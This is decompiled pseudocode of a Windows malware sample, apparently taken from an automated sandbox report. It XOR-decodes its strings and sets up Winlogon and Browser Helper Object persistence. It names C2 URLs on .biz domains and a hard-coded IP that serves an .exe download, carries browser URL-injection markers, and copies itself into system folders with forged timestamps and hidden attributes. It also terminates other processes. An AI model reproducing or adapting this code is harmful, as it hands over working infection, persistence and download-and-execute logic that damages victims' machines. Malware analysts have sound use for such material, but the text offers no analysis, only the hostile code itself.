								_t505 = "\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings";
								while(1) {
									__eflags = _t505 - 0x4106dc;
									if(_t505 >= 0x4106dc) {
										break;
									}
									 *_t505 =  *_t505 ^ 0x000000d4;
									__eflags =  *_t505;
									_t505 = (_t505 ^ _t1217) + 1;
								}
								_t506 = "Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Connections";
								while(1) {
									__eflags = _t506 - 0x410687;
									if(_t506 >= 0x410687) {
										break;
									}
									 *_t506 =  *_t506 ^ 0x000000d4;
									__eflags =  *_t506;
									_t506 = (_t506 ^ _t1217) + 1;
								}
								_t507 = "ProxyEnable";
								while(1) {
									__eflags = _t507 - 0x410621;
									if(_t507 >= 0x410621) {
										break;
									}
									 *_t507 =  *_t507 ^ 0x000000d4;
									__eflags =  *_t507;
									_t507 = (_t507 ^ _t1217) + 1;
								}
								_t508 = "Connections";
								while(1) {
									__eflags = _t508 - 0x410615;
									if(_t508 >= 0x410615) {
										break;
									}
									 *_t508 =  *_t508 ^ 0x000000d4;
									__eflags =  *_t508;
									_t508 = (_t508 ^ _t1217) + 1;
								}
								_t509 = "wininet.dll";
								while(1) {
									__eflags = _t509 - 0x410609;
									if(_t509 >= 0x410609) {
										break;
									}
									 *_t509 =  *_t509 ^ 0x000000d4;
									__eflags =  *_t509;
									_t509 = (_t509 ^ _t1217) + 1;
								}
								_t510 = LoadLibraryA("wininet.dll"); // executed
								__eflags = _t510;
								_t1154 = _t510;
								if(_t510 == 0) {
									 *0x4121d0 = 0;
									L127:
									_t511 = "winrnt.exe";
									while(1) {
										__eflags = _t511 - 0x4105a6;
										if(_t511 >= 0x4105a6) {
											break;
										}
										 *_t511 =  *_t511 ^ 0x000000d4;
										_t511 =  &(_t511[1]);
									}
									_t512 = "rmass.exe";
									while(1) {
										__eflags = _t512 - 0x41059b;
										if(_t512 >= 0x41059b) {
											break;
										}
										 *_t512 =  *_t512 ^ 0x000000d4;
										__eflags =  *_t512;
										_t512 = (_t512 ^ _t1217) + 1;
									}
									_t513 = "RECOVER32.DLL";
									while(1) {
										__eflags = _t513 - 0x410591;
										if(_t513 >= 0x410591) {
											break;
										}
										 *_t513 =  *_t513 ^ 0x000000d4;
										__eflags =  *_t513;
										_t513 = (_t513 ^ _t1217) + 1;
									}
									_t514 = "SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\Notify\\{BC84DF00-BC38-9902-8082-6FCBF2D87A0B}";
									while(1) {
										__eflags = _t514 - 0x410583;
										if(_t514 >= 0x410583) {
											break;
										}
										 *_t514 =  *_t514 ^ 0x000000d4;
										__eflags =  *_t514;
										_t514 = (_t514 ^ _t1217) + 1;
									}
									_t515 = "gymspzd.dll";
									while(1) {
										__eflags = _t515 - 0x41051a;
										if(_t515 >= 0x41051a) {
											break;
										}
										 *_t515 =  *_t515 ^ 0x000000d4;
										__eflags =  *_t515;
										_t515 = (_t515 ^ _t1217) + 1;
									}
									_t516 = "aset32.exe";
									while(1) {
										__eflags = _t516 - 0x41050e;
										if(_t516 >= 0x41050e) {
											break;
										}
										 *_t516 =  *_t516 ^ 0x000000d4;
										__eflags =  *_t516;
										_t516 = (_t516 ^ _t1217) + 1;
									}
									_t517 = "ahuy.exe";
									while(1) {
										__eflags = _t517 - 0x410503;
										if(_t517 >= 0x410503) {
											break;
										}
										 *_t517 =  *_t517 ^ 0x000000d4;
										__eflags =  *_t517;
										_t517 = (_t517 ^ _t1217) + 1;
									}
									_t518 = "idbg32.exe";
									while(1) {
										__eflags = _t518 - 0x4104fa;
										if(_t518 >= 0x4104fa) {
											break;
										}
										 *_t518 =  *_t518 ^ 0x000000d4;
										__eflags =  *_t518;
										_t518 = (_t518 ^ _t1217) + 1;
									}
									_t519 = "ntdbg.exe";
									while(1) {
										__eflags = _t519 - 0x4104ef;
										if(_t519 >= 0x4104ef) {
											break;
										}
										 *_t519 =  *_t519 ^ 0x000000d4;
										__eflags =  *_t519;
										_t519 = (_t519 ^ _t1217) + 1;
									}
									_t520 = "http://%s.biz/d/N?";
									while(1) {
										__eflags = _t520 - 0x4104e5;
										if(_t520 >= 0x4104e5) {
											break;
										}
										 *_t520 =  *_t520 ^ 0x000000d4;
										__eflags =  *_t520;
										_t520 = (_t520 ^ _t1217) + 1;
									}
									_t521 = "http://%s.biz/d/G?";
									while(1) {
										__eflags = _t521 - 0x4104d2;
										if(_t521 >= 0x4104d2) {
											break;
										}
										 *_t521 =  *_t521 ^ 0x000000d4;
										__eflags =  *_t521;
										_t521 = (_t521 ^ _t1217) + 1;
									}
									_t522 = "http://utbidet-ugeas.biz/d/rpt?";
									while(1) {
										__eflags = _t522 - 0x4104bf;
										if(_t522 >= 0x4104bf) {
											break;
										}
										 *_t522 =  *_t522 ^ 0x000000d4;
										__eflags =  *_t522;
										_t522 = (_t522 ^ _t1217) + 1;
									}
									_t523 = "modem";
									while(1) {
										__eflags = _t523 - 0x41049d;
										if(_t523 >= 0x41049d) {
											break;
										}
										 *_t523 =  *_t523 ^ 0x000000d4;
										__eflags =  *_t523;
										_t523 = (_t523 ^ _t1217) + 1;
									}
									_t524 = "isdn";
									while(1) {
										__eflags = _t524 - 0x410497;
										if(_t524 >= 0x410497) {
											break;
										}
										 *_t524 =  *_t524 ^ 0x000000d4;
										__eflags =  *_t524;
										_t524 = (_t524 ^ _t1217) + 1;
									}
									_t525 = "%u.%u.%u.%s";
									while(1) {
										__eflags = _t525 - 0x410492;
										if(_t525 >= 0x410492) {
											break;
										}
										 *_t525 =  *_t525 ^ 0x000000d4;
										__eflags =  *_t525;
										_t525 = (_t525 ^ _t1217) + 1;
									}
									_t526 = "{%02X%02X%02X%02X-%02x%02x-%02x%02x-%02X%02X-%02X%02X%02X%02X%02x%02x}";
									while(1) {
										__eflags = _t526 - 0x410486;
										if(_t526 >= 0x410486) {
											break;
										}
										 *_t526 =  *_t526 ^ 0x000000d4;
										__eflags =  *_t526;
										_t526 = (_t526 ^ _t1217) + 1;
									}
									_t527 = "%ComSpec%";
									while(1) {
										__eflags = _t527 - 0x410425;
										if(_t527 >= 0x410425) {
											break;
										}
										 *_t527 =  *_t527 ^ 0x000000d4;
										__eflags =  *_t527;
										_t527 = (_t527 ^ _t1217) + 1;
									}
									_t528 = "%CommonProgramFiles%\\System\\";
									while(1) {
										__eflags = _t528 - 0x41041b;
										if(_t528 >= 0x41041b) {
											break;
										}
										 *_t528 =  *_t528 ^ 0x000000d4;
										__eflags =  *_t528;
										_t528 = (_t528 ^ _t1217) + 1;
									}
									_t529 = "%AppData%\\";
									while(1) {
										__eflags = _t529 - 0x4103fe;
										if(_t529 >= 0x4103fe) {
											break;
										}
										 *_t529 =  *_t529 ^ 0x000000d4;
										__eflags =  *_t529;
										_t529 = (_t529 ^ _t1217) + 1;
									}
									_t530 = "Debugger";
									while(1) {
										__eflags = _t530 - 0x4103f3;
										if(_t530 >= 0x4103f3) {
											break;
										}
										 *_t530 =  *_t530 ^ 0x000000d4;
										__eflags =  *_t530;
										_t530 = (_t530 ^ _t1217) + 1;
									}
									_t531 = "IsInstalled";
									while(1) {
										__eflags = _t531 - 0x4103ea;
										if(_t531 >= 0x4103ea) {
											break;
										}
										 *_t531 =  *_t531 ^ 0x000000d4;
										__eflags =  *_t531;
										_t531 = (_t531 ^ _t1217) + 1;
									}
									_t532 = "StubPath";
									while(1) {
										__eflags = _t532 - 0x4103de;
										if(_t532 >= 0x4103de) {
											break;
										}
										 *_t532 =  *_t532 ^ 0x000000d4;
										__eflags =  *_t532;
										_t532 = (_t532 ^ _t1217) + 1;
									}
									_t533 = "museum";
									while(1) {
										__eflags = _t533 - 0x4103d5;
										if(_t533 >= 0x4103d5) {
											break;
										}
										 *_t533 =  *_t533 ^ 0x000000d4;
										__eflags =  *_t533;
										_t533 = (_t533 ^ _t1217) + 1;
									}
									_t534 = "GET /%s HTTP/1.0\r\nHost: %s\r\nUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0)\r\n\r\n";
									while(1) {
										__eflags = _t534 - 0x4103ce;
										if(_t534 >= 0x4103ce) {
											break;
										}
										 *_t534 =  *_t534 ^ 0x000000d4;
										__eflags =  *_t534;
										_t534 = (_t534 ^ _t1217) + 1;
									}
									_t535 = "GET /%s HTTP/1.0\r\nHost: %s:%u\r\nUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0)\r\n\r\n";
									while(1) {
										__eflags = _t535 - 0x410371;
										if(_t535 >= 0x410371) {
											break;
										}
										 *_t535 =  *_t535 ^ 0x000000d4;
										__eflags =  *_t535;
										_t535 = (_t535 ^ _t1217) + 1;
									}
									_t536 = "Mozilla/4.0 (compatible; MSIE 6.0; Win32)";
									while(1) {
										__eflags = _t536 - 0x410309;
										if(_t536 >= 0x410309) {
											break;
										}
										 *_t536 =  *_t536 ^ 0x000000d4;
										__eflags =  *_t536;
										_t536 = (_t536 ^ _t1217) + 1;
									}
									_t537 = "HTTP/1.0 200";
									while(1) {
										__eflags = _t537 - 0x4102c8;
										if(_t537 >= 0x4102c8) {
											break;
										}
										 *_t537 =  *_t537 ^ 0x000000d4;
										__eflags =  *_t537;
										_t537 = (_t537 ^ _t1217) + 1;
									}
									_t538 = "urlinj_conn";
									while(1) {
										__eflags = _t538 - 0x4102bb;
										if(_t538 >= 0x4102bb) {
											break;
										}
										 *_t538 =  *_t538 ^ 0x000000d4;
										__eflags =  *_t538;
										_t538 = (_t538 ^ _t1217) + 1;
									}
									_t539 = "urlinj_creat";
									while(1) {
										__eflags = _t539 - 0x4102af;
										if(_t539 >= 0x4102af) {
											break;
										}
										 *_t539 =  *_t539 ^ 0x000000d4;
										__eflags =  *_t539;
										_t539 = (_t539 ^ _t1217) + 1;
									}
									_t540 = "urlinj_xfer";
									while(1) {
										__eflags = _t540 - 0x4102a2;
										if(_t540 >= 0x4102a2) {
											break;
										}
										 *_t540 =  *_t540 ^ 0x000000d4;
										__eflags =  *_t540;
										_t540 = (_t540 ^ _t1217) + 1;
									}
									_t541 = "urlinj_creat_f";
									while(1) {
										__eflags = _t541 - 0x410296;
										if(_t541 >= 0x410296) {
											break;
										}
										 *_t541 =  *_t541 ^ 0x000000d4;
										__eflags =  *_t541;
										_t541 = (_t541 ^ _t1217) + 1;
									}
									_t542 = "urlinj_fork";
									while(1) {
										__eflags = _t542 - 0x410287;
										if(_t542 >= 0x410287) {
											break;
										}
										 *_t542 =  *_t542 ^ 0x000000d4;
										__eflags =  *_t542;
										_t542 = (_t542 ^ _t1217) + 1;
									}
									_t543 = "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced";
									while(1) {
										__eflags = _t543 - 0x41027b;
										if(_t543 >= 0x41027b) {
											break;
										}
										 *_t543 =  *_t543 ^ 0x000000d4;
										__eflags =  *_t543;
										_t543 = (_t543 ^ _t1217) + 1;
									}
									_t544 = "ConnPred";
									while(1) {
										__eflags = _t544 - 0x410230;
										if(_t544 >= 0x410230) {
											break;
										}
										 *_t544 =  *_t544 ^ 0x000000d4;
										__eflags =  *_t544;
										_t544 = (_t544 ^ _t1217) + 1;
									}
									_t545 = "UseExtProfile";
									while(1) {
										__eflags = _t545 - 0x410227;
										if(_t545 >= 0x410227) {
											break;
										}
										 *_t545 =  *_t545 ^ 0x000000d4;
										__eflags =  *_t545;
										_t545 = (_t545 ^ _t1217) + 1;
									}
									_t546 = "UseDflProfile";
									while(1) {
										__eflags = _t546 - 0x410219;
										if(_t546 >= 0x410219) {
											break;
										}
										 *_t546 =  *_t546 ^ 0x000000d4;
										__eflags =  *_t546;
										_t546 = (_t546 ^ _t1217) + 1;
									}
									_t547 = "http://utbidet-ugeas.biz/d/cc";
									while(1) {
										__eflags = _t547 - 0x41020b;
										if(_t547 >= 0x41020b) {
											break;
										}
										 *_t547 =  *_t547 ^ 0x000000d4;
										__eflags =  *_t547;
										_t547 = (_t547 ^ _t1217) + 1;
									}
									_t548 = "grazie.gif";
									while(1) {
										__eflags = _t548 - 0x4101ed;
										if(_t548 >= 0x4101ed) {
											break;
										}
										 *_t548 =  *_t548 ^ 0x000000d4;
										__eflags =  *_t548;
										_t548 = (_t548 ^ _t1217) + 1;
									}
									_t549 = "http://69.50.173.166/gdnOT2424.exe";
									while(1) {
										__eflags = _t549 - 0x4101e2;
										if(_t549 >= 0x4101e2) {
											break;
										}
										 *_t549 =  *_t549 ^ 0x000000d4;
										__eflags =  *_t549;
										_t549 = (_t549 ^ _t1217) + 1;
									}
									_t550 = "tombul.gif";
									while(1) {
										__eflags = _t550 - 0x4101a5;
										if(_t550 >= 0x4101a5) {
											break;
										}
										 *_t550 =  *_t550 ^ 0x000000d4;
										__eflags =  *_t550;
										_t550 = (_t550 ^ _t1217) + 1;
									}
									_t551 = "SubshellState";
									while(1) {
										__eflags = _t551 - 0x41019a;
										if(_t551 >= 0x41019a) {
											break;
										}
										 *_t551 =  *_t551 ^ 0x000000d4;
										__eflags =  *_t551;
										_t551 = (_t551 ^ _t1217) + 1;
									}
									_t552 = "g00d d0gg";
									while(1) {
										__eflags = _t552 - 0x41018c;
										if(_t552 >= 0x41018c) {
											break;
										}
										 *_t552 =  *_t552 ^ 0x000000d4;
										__eflags =  *_t552;
										_t552 = (_t552 ^ _t1217) + 1;
									}
									_t553 = "winlogon.exe";
									while(1) {
										__eflags = _t553 - 0x410182;
										if(_t553 >= 0x410182) {
											break;
										}
										 *_t553 =  *_t553 ^ 0x000000d4;
										__eflags =  *_t553;
										_t553 = (_t553 ^ _t1217) + 1;
									}
									_t554 = "explorer.exe";
									while(1) {
										__eflags = _t554 - 0x410175;
										if(_t554 >= 0x410175) {
											break;
										}
										 *_t554 =  *_t554 ^ 0x000000d4;
										__eflags =  *_t554;
										_t554 = (_t554 ^ _t1217) + 1;
									}
									_t555 = "iexplore.exe";
									while(1) {
										__eflags = _t555 - 0x410168;
										if(_t555 >= 0x410168) {
											break;
										}
										 *_t555 =  *_t555 ^ 0x000000d4;
										__eflags =  *_t555;
										_t555 = (_t555 ^ _t1217) + 1;
									}
									_t556 = "firefox.exe";
									while(1) {
										__eflags = _t556 - 0x41015b;
										if(_t556 >= 0x41015b) {
											break;
										}
										 *_t556 =  *_t556 ^ 0x000000d4;
										__eflags =  *_t556;
										_t556 = (_t556 ^ _t1217) + 1;
									}
									_t557 = "mozilla.exe";
									while(1) {
										__eflags = _t557 - 0x41014f;
										if(_t557 >= 0x41014f) {
											break;
										}
										 *_t557 =  *_t557 ^ 0x000000d4;
										__eflags =  *_t557;
										_t557 = (_t557 ^ _t1217) + 1;
									}
									_t558 = "seamonkey.exe";
									while(1) {
										__eflags = _t558 - 0x410143;
										if(_t558 >= 0x410143) {
											break;
										}
										 *_t558 =  *_t558 ^ 0x000000d4;
										__eflags =  *_t558;
										_t558 = (_t558 ^ _t1217) + 1;
									}
									_t559 = "opera.exe";
									while(1) {
										__eflags = _t559 - 0x410135;
										if(_t559 >= 0x410135) {
											break;
										}
										 *_t559 =  *_t559 ^ 0x000000d4;
										__eflags =  *_t559;
										_t559 = (_t559 ^ _t1217) + 1;
									}
									_t560 = "DLLName";
									while(1) {
										__eflags = _t560 - 0x41012b;
										if(_t560 >= 0x41012b) {
											break;
										}
										 *_t560 =  *_t560 ^ 0x000000d4;
										__eflags =  *_t560;
										_t560 = (_t560 ^ _t1217) + 1;
									}
									_t561 = "Startup";
									while(1) {
										__eflags = _t561 - 0x410123;
										if(_t561 >= 0x410123) {
											break;
										}
										 *_t561 =  *_t561 ^ 0x000000d4;
										__eflags =  *_t561;
										_t561 = (_t561 ^ _t1217) + 1;
									}
									_t562 = "CLSID\\{0D97A4D2-9F3D-E91C-5EAD-E685720E2FCC}\\InProcServer32";
									while(1) {
										__eflags = _t562 - 0x41011b;
										if(_t562 >= 0x41011b) {
											break;
										}
										 *_t562 =  *_t562 ^ 0x000000d4;
										__eflags =  *_t562;
										_t562 = (_t562 ^ _t1217) + 1;
									}
									_t563 = "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Browser Helper Objects\\{0D97A4D2-9F3D-E91C-5EAD-E685720E2FCC}";
									while(1) {
										__eflags = _t563 - 0x4100d0;
										if(_t563 >= 0x4100d0) {
											break;
										}
										 *_t563 =  *_t563 ^ 0x000000d4;
										__eflags =  *_t563;
										_t563 = (_t563 ^ _t1217) + 1;
									}
									_t564 = "ThreadingModel";
									while(1) {
										__eflags = _t564 - 0x41005e;
										if(_t564 >= 0x41005e) {
											break;
										}
										 *_t564 =  *_t564 ^ 0x000000d4;
										__eflags =  *_t564;
										_t564 = (_t564 ^ _t1217) + 1;
									}
									_t565 = "Both";
									while(1) {
										__eflags = _t565 - 0x41004f;
										if(_t565 >= 0x41004f) {
											break;
										}
										 *_t565 =  *_t565 ^ 0x000000d4;
										__eflags =  *_t565;
										_t565 = (_t565 ^ _t1217) + 1;
									}
									_t566 = "http://%s/";
									while(1) {
										__eflags = _t566 - 0x41004a;
										if(_t566 >= 0x41004a) {
											break;
										}
										 *_t566 =  *_t566 ^ 0x000000d4;
										__eflags =  *_t566;
										_t566 = (_t566 ^ _t1217) + 1;
									}
									while(1) {
										__eflags = 0x40fa40 - "http://%s/";
										if(0x40fa40 >= "http://%s/") {
											break;
										}
										 *0x40fa40 =  *0x40fa40 ^ 0x0000004d;
										__eflags =  *0x40fa40;
										 *(_t1295 + 0x40) =  *(_t1295 + 0x40) ^ _t1207;
									}
									while(1) {
										__eflags = 0x40e640 - 0x40fa40;
										if(0x40e640 >= 0x40fa40) {
											break;
										}
										 *0x40e640 =  *0x40e640 ^ 0x0000004d;
										__eflags =  *0x40e640;
										 *(_t1295 + 0x40) =  *(_t1295 + 0x40) ^ _t1207;
									}
									while(1) {
										__eflags = 0x408840 - 0x40e640;
										if(0x408840 >= 0x40e640) {
											break;
										}
										 *0x408840 =  *0x408840 ^ 0x0000004d;
										__eflags =  *0x408840;
										 *(_t1295 + 0x40) =  *(_t1295 + 0x40) ^ _t1207;
									}
									_t571 = CreateFileA(_t1299 + 0x1580, 0x80000000, 1, 0, 3, 0, 0); // executed
									 *(_t1299 + 0xa0) = _t571;
									__eflags = _t571;
									if(_t571 != 0) {
										__eflags = _t571 - 0xffffffff;
										if(_t571 != 0xffffffff) {
											SetFilePointer(_t571, 0xfffffff0, 0, 2); // executed
											ReadFile( *(_t1299 + 0xb0), 0x4120e0, 0x10, _t1299 + 0xa0, 0); // executed
											CloseHandle( *(_t1299 + 0xa0)); // executed
											__eflags =  *0x4120e0;
											if( *0x4120e0 == 0) {
												 *0x4120e0 = E004010B2();
												 *(_t1299 + 0x20) = 1;
											}
										}
									}
									_t572 = ".exe";
									while(1) {
										__eflags = _t572 - 0x408822;
										if(_t572 >= 0x408822) {
											break;
										}
										 *_t572 =  *_t572 ^ 0x000000d4;
										_t572 =  &(_t572[1]);
									}
									_t573 = ".dll";
									while(1) {
										__eflags = _t573 - 0x40881d;
										if(__eflags >= 0) {
											break;
										}
										 *_t573 =  *_t573 ^ 0x000000d4;
										__eflags =  *_t573;
										_t573 = (_t573 ^ _t1217) + 1;
									}
									_t574 =  *0x4120e0; // 0x8ff5b2f0
									 *(_t1299 + 0x9c) = _t574;
									 *0x412090 = E00401F84(".exe", _t1299 + 0x9c, __eflags);
									 *0x4120a0 = E00401F84(".exe", _t1299 + 0x9c, __eflags);
									 *0x4120b0 = E00401F84(".exe", _t1299 + 0x9c, __eflags);
									 *0x4120c0 = E00401F84(".dll", _t1299 + 0x9c, __eflags);
									_t1222 = _t1299 + 0x9c;
									_t584 = E00401F84(".dll", _t1222, __eflags);
									_push( *0x4120b0);
									 *0x4120d0 = _t584;
									_t586 = E004010DC(_t1299 + 0x156c);
									_push(_t586); // executed
									L00405E50(); // executed
									__eflags = _t586;
									_t69 = _t586 == 0;
									__eflags = _t69;
									 *(_t1299 + 0x1c) = (_t586 & 0xffffff00 | _t69) & 0x000000ff;
									_t589 = "qnd_b__-12";
									while(1) {
										__eflags = _t589 - 0x408818;
										if(_t589 >= 0x408818) {
											break;
										}
										 *_t589 =  *_t589 ^ 0x000000d4;
										__eflags =  *_t589;
										_t589 = (_t589 ^ _t1222) + 1;
									}
									_t590 = "Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Connection Policy";
									while(1) {
										__eflags = _t590 - 0x40880d;
										if(_t590 >= 0x40880d) {
											break;
										}
										 *_t590 =  *_t590 ^ 0x000000d4;
										__eflags =  *_t590;
										_t590 = (_t590 ^ _t1222) + 1;
									}
									_t591 = "Default Flags";
									while(1) {
										__eflags = _t591 - 0x4087a5;
										if(_t591 >= 0x4087a5) {
											break;
										}
										 *_t591 =  *_t591 ^ 0x000000d4;
										__eflags =  *_t591;
										_t591 = (_t591 ^ _t1222) + 1;
									}
									 *(_t1299 + 0x34) = 1;
									while(1) {
										_push( *(_t1299 + 0x34));
										wsprintfA(0x408816, "%02X");
										_t593 = CreateMutexA(0x408778, 1, "qnd_b__-12"); // executed
										 *(_t1299 + 0x1c) = _t593;
										_t1299 = _t1299 + 0xc;
										__eflags = _t593;
										if(_t593 == 0) {
											goto L427;
										}
										_t594 = GetLastError();
										__eflags = _t594 - 0xb7;
										if(_t594 != 0xb7) {
											__eflags =  *(_t1299 + 0x34) - 0x11;
											if( *(_t1299 + 0x34) > 0x11) {
												_t1155 = _t1299 + 0x134c;
												_t595 = ExpandEnvironmentStringsA("%ComSpec%", _t1155, 0x104);
												__eflags = _t595;
												if(_t595 != 0) {
													_t981 = CreateFileA(_t1155, 0x80000000, 1, 0, 3, 0, 0); // executed
													 *(_t1299 + 0xa0) = _t981;
													__eflags = _t981 - 0xffffffff;
													_t1261 = _t981;
													if(_t981 != 0xffffffff) {
														GetFileTime(_t1261, _t1299 + 0x84, _t1299 + 0x88, _t1299 + 0x8c);
														CloseHandle( *(_t1299 + 0xa0));
														 *(_t1299 + 0xc) = 1;
													}
												}
												__eflags =  *(_t1299 + 0x1c);
												if( *(_t1299 + 0x1c) != 0) {
													goto L449;
												}
												_t1194 = _t1299 + 0x145c;
												_t956 = GetSystemDirectoryA(_t1194, 0x100);
												_push( *0x4120b0);
												_push(0x41103e);
												_push(_t1194);
												L00405E30();
												L00405E30();
												_t1288 = _t1299 + 0x1568;
												_t958 = E004010F7(_t1299 + 0x1568, _t1194, _t956);
												__eflags = _t958;
												if(_t958 != 0) {
													L437:
													__eflags =  *(_t1299 + 0x20);
													if( *(_t1299 + 0x20) != 0) {
														_t971 = CreateFileA(_t1299 + 0x1470, 0x40000000, 0, 0, 3, 0, 0);
														__eflags = _t971;
														_t1197 = _t971;
														if(_t971 != 0) {
															__eflags = _t971 - 0xffffffff;
															if(_t971 != 0xffffffff) {
																SetFilePointer(_t971, 0xfffffff0, 0, 2);
																WriteFile(_t1197, 0x4120e0, 4, _t1299 + 0xa0, 0);
																CloseHandle(_t1197);
															}
														}
													}
													__eflags =  *(_t1299 + 0xc);
													if( *(_t1299 + 0xc) != 0) {
														_t964 = CreateFileA(_t1299 + 0x1470, 0x80000100, 1, 0, 3, 0, 0); // executed
														__eflags = _t964;
														_t1196 = _t964;
														if(_t964 != 0) {
															__eflags = _t964 - 0xffffffff;
															if(_t964 != 0xffffffff) {
																SetFileTime(_t1196, _t1299 + 0x84, _t1299 + 0x88, _t1299 + 0x8c); // executed
																CloseHandle(_t1196);
															}
														}
													}
													_t1289 = _t1299 + 0x145c;
													SetFileAttributesA(_t1289, 0x21); // executed
													CloseHandle( *(_t1299 + 0x10));
													_t1195 = _t1299 + 0xb28;
													GetStartupInfoA(_t1195);
													CreateProcessA(_t1289, 0, 0, 0, 0, 0, 0, 0, _t1195, _t1299 + 0xb18);
													goto L446;
												}
												_push(0x104);
												_push(_t1194);
												_push( *0x4120b0);
												_push("%CommonProgramFiles%\\System\\");
												_t1267 = _t1299 + 0x1358;
												L00405E20();
												L00405E30();
												_t976 = ExpandEnvironmentStringsA(_t958, _t958, _t1267);
												__eflags = _t976;
												if(_t976 == 0) {
													L435:
													_push(0x104);
													_push(_t1194);
													_push( *0x4120b0);
													_push("%AppData%\\");
													L00405E20();
													L00405E30();
													_t977 = ExpandEnvironmentStringsA(_t976, _t976, _t1267);
													__eflags = _t977;
													if(_t977 == 0) {
														goto L448;
													}
													_t979 = E004010F7(_t1288, _t1194);
													__eflags = _t979;
													if(_t979 == 0) {
														goto L448;
													}
													goto L437;
												}
												_t976 = E004010F7(_t1288, _t1194);
												__eflags = _t976;
												if(_t976 != 0) {
													goto L437;
												}
												goto L435;
											}
											L426:
											CloseHandle( *(_t1299 + 0x10)); // executed
											goto L427;
										}
										__eflags =  *(_t1299 + 0x34) - 0x11;
										if( *(_t1299 + 0x34) > 0x11) {
											__eflags =  *(_t1299 + 0x1c);
											if( *(_t1299 + 0x1c) != 0) {
												goto L447;
											}
											E0040265F(0);
											goto L426;
										}
										_t988 = CreateToolhelp32Snapshot(2, 0);
										__eflags = _t988;
										_t1298 = _t988;
										if(_t988 == 0) {
											L415:
											__eflags =  *(_t1299 + 0x34) - 0xb;
											if( *(_t1299 + 0x34) > 0xb) {
												goto L426;
											}
											_t990 = RegOpenKeyExA(0x80000001, "Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Connection Policy", 0, 0x20019, _t1299 + 0x98);
											__eflags = _t990;
											if(_t990 != 0) {
												goto L426;
											}
											 *(_t1299 + 0x30) = 0;
											_t992 = RegCreateKeyExA(0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Connection Policy", 0, 0, 0, 0xf003f, 0x408778, _t1299 + 0x98, 0);
											__eflags = _t992;
											if(_t992 != 0) {
												L422:
												RegCloseKey( *(_t1299 + 0x98));
												goto L426;
											}
											 *(_t1299 + 0x9c) = 0x12;
											_t995 = RegQueryValueExA( *(_t1299 + 0xac), "Default Flags", 0, 0, 0x412190, _t1299 + 0x9c);
											__eflags = _t995;
											if(_t995 == 0) {
												_t998 = RegSetValueExA( *(_t1299 + 0xa8), "Default Flags", 0, 3, 0x412190, 0x12);
												__eflags = _t998;
												_t113 = _t998 == 0;
												__eflags = _t113;
												 *(_t1299 + 0x30) = (_t998 & 0xffffff00 | _t113) & 0x000000ff;
											}
											RegCloseKey( *(_t1299 + 0x94));
											__eflags =  *(_t1299 + 0x30);
											if( *(_t1299 + 0x30) == 0) {
												RegDeleteKeyA(0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Connection Policy");
											}
											goto L422;
										}
										_t1002 = E004030DE(_t1299 + 0x1f8);
										 *(_t1299 + 4) = _t1002;
										__eflags = _t1002;
										if(_t1002 == 0) {
											L394:
											_t1003 = GetCurrentProcessId();
											 *(_t1299 + 0x428) = 0x128;
											_t1198 = _t1003;
											_t1268 = 0;
											__eflags = 0;
											_t1005 = Process32First(_t1298, _t1299 + 0x428);
											while(1) {
												__eflags = _t1005;
												if(_t1005 == 0) {
													break;
												}
												__eflags =  *(_t1299 + 0x430) - _t1198;
												if( *(_t1299 + 0x430) == _t1198) {
													L401:
													_t1005 = Process32Next(_t1298, _t1299 + 0x428);
													continue;
												}
												_push( *0x4120b0);
												_t1015 = E004010DC(_t1299 + 0x450);
												_push(_t1015);
												_t1291 = _t1015;
												L00405E50();
												__eflags = _t1015;
												if(_t1015 == 0) {
													L399:
													_t1016 = OpenProcess(0x100201, 0,  *(_t1299 + 0x430));
													 *(_t1299 + 0x558 + _t1268 * 4) = _t1016;
													__eflags = _t1016;
													if(_t1016 == 0) {
														goto L401;
													}
													_t1268 = _t1268 + 1;
													__eflags = _t1268 - 9;
													if(_t1268 > 9) {
														break;
													}
													goto L401;
												}
												_push("winrnt.exe");
												_push(_t1291);
												L00405E50();
												__eflags = _t1015;
												if(_t1015 != 0) {
													goto L401;
												}
												goto L399;
											}
											_t1199 = 0;
											__eflags = 0;
											CloseHandle(_t1298);
											while(1) {
												__eflags = _t1199 - _t1268;
												if(_t1199 >= _t1268) {
													break;
												}
												_t1199 = _t1199 + 1;
												SetPriorityClass( *(_t1299 + 0x55c + _t1199 * 4), 0x40);
											}
											_t1290 = 4;
											do {
												_t1200 = 0;
												__eflags = 0;
												while(1) {
													__eflags = _t1200 - _t1268;
													if(_t1200 >= _t1268) {
														goto L409;
													}
													_t1200 = _t1200 + 1;
													TerminateProcess( *(_t1299 + 0x55c + _t1200 * 4), 0);
												}
												L409:
												_t1290 = _t1290 - 1;
												__eflags = _t1290;
											} while (_t1290 >= 0);
											_t1201 = 0;
											__eflags = 0;
											while(1) {
												__eflags = _t1201 - _t1268;
												if(_t1201 >= _t1268) {
													break;
												}
												WaitForSingleObject( *(_t1299 + 0x55c + _t1201 * 4), 0x1388);
												_t1201 = _t1201 + 1;
												CloseHandle( *(_t1299 + 0x558 + _t1201 * 4));
											}
											__eflags =  *(_t1299 + 4);
											if( *(_t1299 + 4) != 0) {
												_t1202 = _t1299 + 0x21e;
												SetFileAttributesA(_t1202, 0x80);
												DeleteFileA(_t1202);
											}
											goto L415;
										}
										RegDeleteValueA(_t1002, "SubshellState");
										RegCloseKey( *(_t1299 + 4));
										_t1292 = _t1299 + 0x21a;
										_t1262 = _t1299 + 0x31e;
										while(1) {
											__eflags = _t1292 - _t1262;
											if(_t1292 >= _t1262) {
												goto L394;
											}
											 *_t1292 =  *_t1292 ^  *(_t1299 + 0x1f8) & 0x000000ff;
											_t1292 =  &(_t1292[0]);
										}
										goto L394;
										L427:
										 *(_t1299 + 0x34) =  *(_t1299 + 0x34) + 1;
									}
								}
								_t1084 = "InternetOpenA";
								while(1) {
									__eflags = _t1084 - 0x4105fd;
									if(_t1084 >= 0x4105fd) {
										break;
									}
									 *_t1084 =  *_t1084 ^ 0x000000d4;
									_t1084 =  &(_t1084[1]);
								}
